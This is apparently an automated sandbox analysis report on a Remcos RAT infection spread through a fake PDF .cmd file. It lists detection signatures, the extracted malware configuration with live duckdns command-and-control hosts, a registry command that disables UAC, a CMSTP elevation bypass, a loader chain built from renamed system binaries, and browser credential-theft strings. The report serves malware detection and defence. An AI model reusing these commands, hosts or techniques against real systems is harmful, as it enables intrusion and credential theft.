62.2.SndVol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
62.2.SndVol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
62.2.SndVol.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
62.2.SndVol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
62.2.SndVol.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
62.2.SndVol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
62.2.SndVol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
62.2.SndVol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
26.2.ANYDESK.PIF.256fc48.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
26.2.ANYDESK.PIF.2b00000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\ANYDESK.PIF, ProcessId: 1944, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" , CommandLine: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" , CommandLine|base64offset|contains: , Image: C:\Users\Public\expha.pif, NewProcessName: C:\Users\Public\expha.pif, OriginalFileName: C:\Users\Public\expha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5812, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" , ProcessId: 3308, ProcessName: expha.pif

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\ANYDESK.PIF" , ParentImage: C:\Users\Public\ANYDESK.PIF, ParentProcessId: 1944, ParentProcessName: ANYDESK.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"", ProcessId: 72, ProcessName: cmd.exe

Sigma detected: Suspicious Creation with Colorcpl

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 4452, TargetFilename: C:\Users\user

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\\Users\\user\\Links\Kaitdipg.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\ANYDESK.PIF, ProcessId: 1944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kaitdipg

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" , CommandLine: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" , CommandLine|base64offset|contains: , Image: C:\Users\Public\expha.pif, NewProcessName: C:\Users\Public\expha.pif, OriginalFileName: C:\Users\Public\expha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5812, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" , ProcessId: 3308, ProcessName: expha.pif

Sigma detected: Potentially Suspicious Rundll32 Activity

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF , CommandLine: C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF , CommandLine|base64offset|contains: , Image: C:\Users\Public\rdha.pif, NewProcessName: C:\Users\Public\rdha.pif, OriginalFileName: C:\Users\Public\rdha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5812, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF , ProcessId: 6876, ProcessName: rdha.pif

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 8C A9 EF EF FC 15 56 C3 64 EB D2 D2 7E 5F DF 5C C7 6A 28 54 3E 2F 68 95 0C 83 B3 51 E9 B6 F4 87 3F DD CC F7 3B 24 9A B9 74 B8 3F 3D CC 26 05 F8 1E 82 CA F9 44 6C F8 2A 54 08 FA BD 87 44 0E 78 2B EE , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 4452, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-14MUP4\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T09:03:47.734595+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.16	56053	193.9.36.1	5200	TCP
2025-03-14T09:03:48.523017+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.16	56054	194.59.31.85	2500	TCP
2025-03-14T09:03:49.754054+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.16	56055	194.59.31.85	2500	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T09:03:49.863747+0100	2803304	3	Unknown Traffic	192.168.2.16	56056	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: baddieszn.duckdns.org	Avira URL Cloud: Label: phishing
Source: conquer25.duckdns.org	Avira URL Cloud: Label: phishing
Source: bahadii.duckdns.org	Avira URL Cloud: Label: phishing
Source: unforseen.duckdns.org	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["baddieszn.duckdns.org:5200:1", "bahadii.duckdns.org:2500:1", "conquer25.duckdns.org:2404:0", "unforseen.duckdns.org:2404:0"], "Assigned name": "WE GO AGAIN", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-14MUP4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara detected Remcos RAT

Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00407687 GetProcAddress,FreeLibrary,CryptUnprotectData,	47_2_00407687
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	62_2_00433B64
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_068649F2 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	62_2_068649F2

Source: SndVol.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_00406ABC _wcslen,CoGetObject,

62_2_00406ABC

Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source:	Binary string: extrac32.pdb source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr
Source:	Binary string: rundll32.pdb source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source:	Binary string: rundll32.pdbGCTL source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source:	Binary string: certutil.pdb source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source:	Binary string: cmd.pdb source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source:	Binary string: easinvoker.pdbGCTL source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.00000000009EB000.00000004.00000020.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: certutil.pdbGCTL source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source:	Binary string: extrac32.pdbGCTL source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr

Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B052F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	26_2_02B052F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_053610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	35_2_053610F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05366580 FindFirstFileExA,	35_2_05366580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0040B477 FindFirstFileW,FindNextFileW,	47_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	49_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	53_2_00407898
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	62_2_004090DC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	62_2_0040B6B5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	62_2_0041C7E5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	62_2_0040B8BA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0044E989 FindFirstFileExA,	62_2_0044E989
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	62_2_00408CDE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	62_2_00419CEE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	62_2_00407EDD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00406F13 FindFirstFileW,FindNextFileW,	62_2_00406F13
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684D673 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	62_2_0684D673
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0683C543 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	62_2_0683C543
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06839F6A __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	62_2_06839F6A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06837DA1 FindFirstFileW,FindNextFileW,	62_2_06837DA1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06838D6B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	62_2_06838D6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684AB7C FindFirstFileW,	62_2_0684AB7C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0687F817 FindFirstFileExA,	62_2_0687F817

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

62_2_00407357

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:56053 -> 193.9.36.1:5200
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:56054 -> 194.59.31.85:2500
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:56055 -> 194.59.31.85:2500

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: baddieszn.duckdns.org
Source: Malware configuration extractor	URLs: bahadii.duckdns.org
Source: Malware configuration extractor	URLs: conquer25.duckdns.org
Source: Malware configuration extractor	URLs: unforseen.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: bahadii.duckdns.org
Source: unknown	DNS query: name: baddieszn.duckdns.org

Uses ping.exe to check the status of other devices and networks

Source: C:\Users\Public\alpha.pif

Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1

Source: global traffic	TCP traffic: 192.168.2.16:56053 -> 193.9.36.1:5200
Source: global traffic	TCP traffic: 192.168.2.16:56054 -> 194.59.31.85:2500

Source: global traffic

TCP traffic: 192.168.2.16:55933 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.16:56056 -> 178.237.33.50:80

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_004062E2 ShellExecuteW,URLDownloadToFileW,

62_2_004062E2

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: recover.exe, 0000002F.00000003.2130745608.0000000002F8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0D00000000149202E898FCF241BC257D65498D6FF3228000000000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C00000000004E495441F9BFB80100AA0037D96E0000000043003A005C00550073006500720073005C00630061006C0069005C0044006F00630075006D0065006E00740073005C004F00750074006C006F006F006B002000460069006C00650073005C004F00750074006C006F006F006B00200044006100740061002000460069006C00650020002D0020004E006F0045006D00610069006C002E007000730074000000file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: recover.exe, 0000002F.00000003.2130745608.0000000002F8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0D00000000149202E898FCF241BC257D65498D6FF3228000000000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C00000000004E495441F9BFB80100AA0037D96E0000000043003A005C00550073006500720073005C00630061006C0069005C0044006F00630075006D0065006E00740073005C004F00750074006C006F006F006B002000460069006C00650073005C004F00750074006C006F006F006B00200044006100740061002000460069006C00650020002D0020004E006F0045006D00610069006C002E007000730074000000file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
